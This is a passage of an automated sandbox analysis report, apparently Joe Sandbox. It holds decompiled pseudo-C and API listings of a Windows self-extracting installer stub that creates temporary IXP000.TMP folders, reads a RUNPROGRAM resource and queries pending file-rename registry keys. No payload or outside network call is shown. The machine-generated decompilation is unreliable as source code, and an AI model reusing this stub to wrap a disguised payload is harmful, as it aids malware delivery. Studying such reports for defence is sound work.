                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                        								E003D1F90(_t19, _t21, _t22);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t6 =  *0x3d8588; // 0x0
                                                                        				if(_t6 != 0) {
                                                                        					CloseHandle(_t6);
                                                                        				}
                                                                        				_t7 =  *0x3d9124; // 0x0
                                                                        				return _t7;
                                                                        			}



















                                                                        APIs
                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,003D6BB0,003D0000,00000000,00000002,0000000A), ref: 003D2C03
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,003D6BB0,003D0000,00000000,00000002,0000000A), ref: 003D2C18
                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 003D2C28
                                                                        • CloseHandle.KERNEL32(00000000,?,?,003D6BB0,003D0000,00000000,00000002,0000000A), ref: 003D2C98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                        • API String ID: 62482547-3460614246
                                                                        • Opcode ID: d7dc738dac340851708a809d416ba39d7be189b03a8292236c6c05ec288c4fe2
                                                                        • Instruction ID: 70be843c4de999e1e0f2c0a1dffc35b6cd30df3e56b2aa6db75099e23d4f91a9
                                                                        • Opcode Fuzzy Hash: d7dc738dac340851708a809d416ba39d7be189b03a8292236c6c05ec288c4fe2
                                                                        • Instruction Fuzzy Hash: FC11EC736222056BC7236BB5BD89A6F376DABA8380F060417F810D7354CA21DC018661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D6F40() {
                                                                        
                                                                        				SetUnhandledExceptionFilter(E003D6EF0); // executed
                                                                        				return 0;
                                                                        			}



                                                                        0x003d6f45
                                                                        0x003d6f4d

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 003D6F45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 8c6f037d730ed5f679021c7fb2cd34166d71ea476613bf899ca28b64eadd7d12
                                                                        • Instruction ID: 1b0c9f09e24784cc42c6f60c8b1835d67b734b2f60c2e1d0b104d5f550566850
                                                                        • Opcode Fuzzy Hash: 8c6f037d730ed5f679021c7fb2cd34166d71ea476613bf899ca28b64eadd7d12
                                                                        • Instruction Fuzzy Hash: B69002652525009796121B70BF1A45577995A4D743F815462E021C4594DB6040405512
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (function 3d55a0; legend: Executed / Not Executed; graph not preserved)
                                                                        C-Code - Quality: 92%
                                                                        			E003D55A0(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v265;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				int _t32;
                                                                        				int _t33;
                                                                        				int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				long _t48;
                                                                        				int _t49;
                                                                        				int _t50;
                                                                        				signed int _t53;
                                                                        				int _t54;
                                                                        				int _t59;
                                                                        				char _t60;
                                                                        				int _t65;
                                                                        				char _t66;
                                                                        				int _t67;
                                                                        				int _t68;
                                                                        				int _t69;
                                                                        				int _t70;
                                                                        				int _t71;
                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                        				int _t73;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t88;
                                                                        				void* _t103;
                                                                        				signed int _t110;
                                                                        
                                                                        				_t28 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t28 ^ _t110;
                                                                        				_t2 = E003D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                        				if(_t109 != 0) {
                                                                        					_t82 = "RUNPROGRAM";
                                                                        					_t32 = E003D468F(_t82, _t109, 1);
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                        						__eflags = _t33;
                                                                        						if(_t33 == 0) {
                                                                        							 *0x3d9a30 = 1;
                                                                        						}
                                                                        						LocalFree(_t109);
                                                                        						_t35 =  *0x3d8b3e; // 0x0
                                                                        						__eflags = _t35;
                                                                        						if(_t35 == 0) {
                                                                        							__eflags =  *0x3d8a24; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								L46:
                                                                        								_t101 = 0x7d2;
                                                                        								_t36 = E003D6517(_t82, 0x7d2, 0, E003D3210, 0, 0);
                                                                        								asm("sbb eax, eax");
                                                                        								_t38 =  ~( ~_t36);
                                                                        							} else {
                                                                        								__eflags =  *0x3d9a30; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t109 = 0x3d91e4;
                                                                        									_t40 = GetTempPathA(0x104, 0x3d91e4);
                                                                        									__eflags = _t40;
                                                                        									if(_t40 == 0) {
                                                                        										L19:
                                                                        										_push(_t82);
                                                                        										E003D1781( &_v268, 0x104, _t82, "A:\\");
                                                                        										__eflags = _v268 - 0x5a;
                                                                        										if(_v268 <= 0x5a) {
                                                                        											do {
                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                        												__eflags = _t109 - 6;
                                                                        												if(_t109 == 6) {
                                                                        													L22:
                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                        													__eflags = _t48 - 0xffffffff;
                                                                        													if(_t48 != 0xffffffff) {
                                                                        														goto L30;
                                                                        													} else {
                                                                        														goto L23;
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t109 - 3;
                                                                        													if(_t109 != 3) {
                                                                        														L23:
                                                                        														__eflags = _t109 - 2;
                                                                        														if(_t109 != 2) {
                                                                        															L28:
                                                                        															_t66 = _v268;
                                                                        															goto L29;
                                                                        														} else {
                                                                        															_t66 = _v268;
                                                                        															__eflags = _t66 - 0x41;
                                                                        															if(_t66 == 0x41) {
                                                                        																L29:
                                                                        																_t60 = _t66 + 1;
                                                                        																_v268 = _t60;
                                                                        																goto L42;
                                                                        															} else {
                                                                        																__eflags = _t66 - 0x42;
                                                                        																if(_t66 == 0x42) {
                                                                        																	goto L29;
                                                                        																} else {
                                                                        																	_t68 = E003D6952( &_v268);
                                                                        																	__eflags = _t68;
                                                                        																	if(_t68 == 0) {
                                                                        																		goto L28;
                                                                        																	} else {
                                                                        																		__eflags = _t68 - 0x19000;
                                                                        																		if(_t68 >= 0x19000) {
                                                                        																			L30:
                                                                        																			_push(0);
                                                                        																			_t103 = 3;
                                                                        																			_t49 = E003D597D( &_v268, _t103, 1);
                                                                        																			__eflags = _t49;
                                                                        																			if(_t49 != 0) {
                                                                        																				L33:
                                                                        																				_t50 = E003D2630(0,  &_v268, 1);
                                                                        																				__eflags = _t50;
                                                                        																				if(_t50 != 0) {
                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                        																				}
                                                                        																				_t88 =  &_v268;
                                                                        																				E003D658A(_t88, 0x104, "msdownld.tmp");
                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                        																				if(_t53 != 0xffffffff) {
                                                                        																					_t54 = _t53 & 0x00000010;
                                                                        																					__eflags = _t54;
                                                                        																				} else {
                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                        																				}
                                                                        																				__eflags = _t54;
                                                                        																				if(_t54 != 0) {
                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                        																					_push(_t88);
                                                                        																					_t109 = 0x3d91e4;
                                                                        																					E003D1781(0x3d91e4, 0x104, _t88,  &_v268);
                                                                        																					_t101 = 1;
                                                                        																					_t59 = E003D5467(0x3d91e4, 1, 0);
                                                                        																					__eflags = _t59;
                                                                        																					if(_t59 != 0) {
                                                                        																						goto L45;
                                                                        																					} else {
                                                                        																						_t60 = _v268;
                                                                        																						goto L42;
                                                                        																					}
                                                                        																				} else {
                                                                        																					_t60 = _v268 + 1;
                                                                        																					_v265 = 0;
                                                                        																					_v268 = _t60;
                                                                        																					goto L42;
                                                                        																				}
                                                                        																			} else {
                                                                        																				_t65 = E003D2630(0,  &_v268, 1);
                                                                        																				__eflags = _t65;
                                                                        																				if(_t65 != 0) {
                                                                        																					goto L28;
                                                                        																				} else {
                                                                        																					_t67 = E003D597D( &_v268, 1, 1, 0);
                                                                        																					__eflags = _t67;
                                                                        																					if(_t67 == 0) {
                                                                        																						goto L28;
                                                                        																					} else {
                                                                        																						goto L33;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																		} else {
                                                                        																			goto L28;
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												goto L47;
                                                                        												L42:
                                                                        												__eflags = _t60 - 0x5a;
                                                                        											} while (_t60 <= 0x5a);
                                                                        										}
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t101 = 1;
                                                                        										_t69 = E003D5467(0x3d91e4, 1, 3); // executed
                                                                        										__eflags = _t69;
                                                                        										if(_t69 != 0) {
                                                                        											goto L45;
                                                                        										} else {
                                                                        											_t82 = 0x3d91e4;
                                                                        											_t70 = E003D2630(0, 0x3d91e4, 1);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												goto L19;
                                                                        											} else {
                                                                        												_t101 = 1;
                                                                        												_t82 = 0x3d91e4;
                                                                        												_t71 = E003D5467(0x3d91e4, 1, 1);
                                                                        												__eflags = _t71;
                                                                        												if(_t71 != 0) {
                                                                        													goto L45;
                                                                        												} else {
                                                                        													do {
                                                                        														goto L19;
                                                                        														L43:
                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                        														_push(4);
                                                                        														_t101 = 3;
                                                                        														_t82 =  &_v268;
                                                                        														_t44 = E003D597D(_t82, _t101, 1);
                                                                        														__eflags = _t44;
                                                                        													} while (_t44 != 0);
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t35 - 0x5c;
                                                                        							if(_t35 != 0x5c) {
                                                                        								L10:
                                                                        								_t72 = 1;
                                                                        							} else {
                                                                        								__eflags =  *0x3d8b3f - _t35; // 0x0
                                                                        								_t72 = 0;
                                                                        								if(__eflags != 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        							_t101 = 0;
                                                                        							_t73 = E003D5467(0x3d8b3e, 0, _t72);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								L45:
                                                                        								_t38 = 1;
                                                                        							} else {
                                                                        								_t101 = 0x4be;
                                                                        								E003D44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t101 = 0x4b1;
                                                                        						E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						LocalFree(_t109);
                                                                        						 *0x3d9124 = 0x80070714;
                                                                        						goto L2;
                                                                        					}
                                                                        				} else {
                                                                        					_t101 = 0x4b5;
                                                                        					E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					L2:
                                                                        					_t38 = 0;
                                                                        				}
                                                                        				L47:
                                                                        				return E003D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                        			}






































                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003D55CF
                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 003D5638
                                                                        • LocalFree.KERNEL32(00000000), ref: 003D564C
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003D5620
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D56B9
                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 003D571E
                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 003D5737
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003D57CD
                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003D57EF
                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 003D5802
                                                                          • Part of subcall function 003D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 003D2654
                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 003D5830
                                                                          • Part of subcall function 003D6517: FindResourceA.KERNEL32(003D0000,000007D6,00000005), ref: 003D652A
                                                                          • Part of subcall function 003D6517: LoadResource.KERNEL32(003D0000,00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003D6538
                                                                          • Part of subcall function 003D6517: DialogBoxIndirectParamA.USER32(003D0000,00000000,00000547,003D19E0,00000000), ref: 003D6557
                                                                          • Part of subcall function 003D6517: FreeResource.KERNEL32(00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003D6560
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 003D5878
                                                                          • Part of subcall function 003D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003D59A8
                                                                          • Part of subcall function 003D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003D59AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                        • API String ID: 2436801531-1216675450
                                                                        • Opcode ID: cacdbdfd6e97ea6c75d899cdb46b8e08cc492280c182c722b8a5937ac8980381
                                                                        • Instruction ID: a3cfd5134be117246092717831bb71b3aab480800f5348bd979b6d5a25f9deb7
                                                                        • Opcode Fuzzy Hash: cacdbdfd6e97ea6c75d899cdb46b8e08cc492280c182c722b8a5937ac8980381
                                                                        • Instruction Fuzzy Hash: 97814AB3B05A149BDB23AB71BD81BEA736D9B61300F1400A7F586D6390DF70CEC18A11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 95%
                                                                        			E003D53A1(CHAR* __ecx, CHAR* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t5;
                                                                        				long _t13;
                                                                        				int _t14;
                                                                        				CHAR* _t20;
                                                                        				int _t29;
                                                                        				int _t30;
                                                                        				CHAR* _t32;
                                                                        				signed int _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t5 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t5 ^ _t33;
                                                                        				_t32 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_t29 = 0;
                                                                        				while(1) {
                                                                        					E003D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                        					_t34 = _t34 + 0x10;
                                                                        					_t29 = _t29 + 1;
                                                                        					E003D1680(_t32, 0x104, _t20);
                                                                        					E003D658A(_t32, 0x104,  &_v268); // executed
                                                                        					RemoveDirectoryA(_t32); // executed
                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                        					if(_t13 == 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t29 < 0x190) {
                                                                        						continue;
                                                                        					}
                                                                        					L3:
                                                                        					_t30 = 0;
                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                        						_t30 = 1;
                                                                        						DeleteFileA(_t32);
                                                                        						CreateDirectoryA(_t32, 0);
                                                                        					}
                                                                        					L5:
                                                                        					return E003D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                        				}
                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                        				if(_t14 == 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				 *0x3d8a20 = 1;
                                                                        				goto L5;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 003D171E: _vsnprintf.MSVCRT ref: 003D1750
                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D53FB
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5402
                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D541F
                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D542B
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5434
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5452
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                        • API String ID: 1082909758-1581276140
                                                                        • Opcode ID: 32339723b6d1e3156cb9c51749addc5a6e660e8eba97c7a9cfc786654cd7fa64
                                                                        • Instruction ID: 422a6183ae3cf963cb6e7381dbffd5166f47de3b915633e509890251fa7d9518
                                                                        • Opcode Fuzzy Hash: 32339723b6d1e3156cb9c51749addc5a6e660e8eba97c7a9cfc786654cd7fa64
                                                                        • Instruction Fuzzy Hash: 9C11B27270291477D323AB26BD49FAF776DEFC5711F000127F556D2290CE74898686A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 519 3d256d-3d257d 520 3d2583-3d2589 519->520 521 3d2622-3d2627 call 3d24e0 519->521 522 3d25e8-3d2607 RegOpenKeyExA 520->522 523 3d258b 520->523 525 3d2629-3d262f 521->525 527 3d2609-3d2620 RegQueryInfoKeyA 522->527 528 3d25e3-3d25e6 522->528 523->525 526 3d2591-3d2595 523->526 526->525 530 3d259b-3d25ba RegOpenKeyExA 526->530 531 3d25d1-3d25dd RegCloseKey 527->531 528->525 530->528 532 3d25bc-3d25cb RegQueryValueExA 530->532 531->528 532->531
                                                                        C-Code - Quality: 86%
                                                                        			E003D256D(signed int __ecx) {
                                                                        				int _v8;
                                                                        				void* _v12;
                                                                        				signed int _t13;
                                                                        				signed int _t19;
                                                                        				long _t24;
                                                                        				void* _t26;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                        				_t31 = 0;
                                                                        				if(_t13 == 0) {
                                                                        					_t31 = E003D24E0(_t26);
                                                                        				} else {
                                                                        					_t34 = _t13 - 1;
                                                                        					if(_t34 == 0) {
                                                                        						_v8 = 0;
                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                        							goto L7;
                                                                        						} else {
                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                        							goto L6;
                                                                        						}
                                                                        						L12:
                                                                        					} else {
                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                        							_v8 = 0;
                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                        							if(_t24 == 0) {
                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                        								L6:
                                                                        								asm("sbb eax, eax");
                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                        								RegCloseKey(_v12); // executed
                                                                        							}
                                                                        							L7:
                                                                        							_t31 = _v8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        				goto L12;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,003D4096,003D4096,?,003D1ED3,00000001,00000000,?,?,003D4137,?), ref: 003D25B2
                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,003D4096,?,003D1ED3,00000001,00000000,?,?,003D4137,?,003D4096), ref: 003D25CB
                                                                        • RegCloseKey.KERNELBASE(?,?,003D1ED3,00000001,00000000,?,?,003D4137,?,003D4096), ref: 003D25DD
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,003D4096,003D4096,?,003D1ED3,00000001,00000000,?,?,003D4137,?), ref: 003D25FF
                                                                        • RegQueryInfoKeyA.ADVAPI32 ref: 003D261A
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003D25F5
                                                                        • PendingFileRenameOperations, xrefs: 003D25C3
                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 003D25A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                        • API String ID: 2209512893-559176071
                                                                        • Opcode ID: 9a9d770ba307db3c4c4d22503989c526c1fa635b7bdd3e5f56a45039f6936ffb
                                                                        • Instruction ID: 64e6e2169fcfe3fd396d0e46f36a8e5ba02fa93f2b9d59ab64ebb78d71f31fab
                                                                        • Opcode Fuzzy Hash: 9a9d770ba307db3c4c4d22503989c526c1fa635b7bdd3e5f56a45039f6936ffb
                                                                        • Instruction Fuzzy Hash: 3F115836942228BB9B229B92BD09DFFBF7CDF557A1F104057F808E2250D6709F44E6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 533 3d6a60-3d6a91 call 3d7155 call 3d7208 GetStartupInfoW 539 3d6a93-3d6aa2 533->539 540 3d6abc-3d6abe 539->540 541 3d6aa4-3d6aa6 539->541 542 3d6abf-3d6ac5 540->542 543 3d6aaf-3d6aba Sleep 541->543 544 3d6aa8-3d6aad 541->544 545 3d6ac7-3d6acf _amsg_exit 542->545 546 3d6ad1-3d6ad7 542->546 543->539 544->542 547 3d6b0b-3d6b11 545->547 548 3d6ad9-3d6ae9 call 3d6c3f 546->548 549 3d6b05 546->549 551 3d6b2e-3d6b30 547->551 552 3d6b13-3d6b24 _initterm 547->552 553 3d6aee-3d6af2 548->553 549->547 554 3d6b3b-3d6b42 551->554 555 3d6b32-3d6b39 551->555 552->551 553->547 556 3d6af4-3d6b00 553->556 557 3d6b44-3d6b51 call 3d7060 554->557 558 3d6b67-3d6b71 554->558 555->554 560 3d6c39-3d6c3e call 3d724d 556->560 557->558 567 3d6b53-3d6b65 557->567 559 3d6b74-3d6b79 558->559 564 3d6b7b-3d6b7d 559->564 565 3d6bc5-3d6bc8 559->565 570 3d6b7f-3d6b81 564->570 571 3d6b94-3d6b98 564->571 568 3d6bca-3d6bd3 565->568 569 3d6bd6-3d6be3 _ismbblead 565->569 567->558 568->569 572 3d6be9-3d6bed 569->572 573 3d6be5-3d6be6 569->573 570->565 574 3d6b83-3d6b85 570->574 575 3d6b9a-3d6b9e 571->575 576 3d6ba0-3d6ba2 571->576 572->559 578 3d6c1e-3d6c25 572->578 573->572 574->571 579 3d6b87-3d6b8a 574->579 580 3d6ba3-3d6bbc call 3d2bfb 575->580 576->580 583 3d6c27-3d6c2d _cexit 578->583 584 3d6c32 578->584 579->571 582 3d6b8c-3d6b92 579->582 580->578 586 3d6bbe-3d6bbf exit 580->586 582->574 583->584 584->560 586->565
                                                                        C-Code - Quality: 51%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
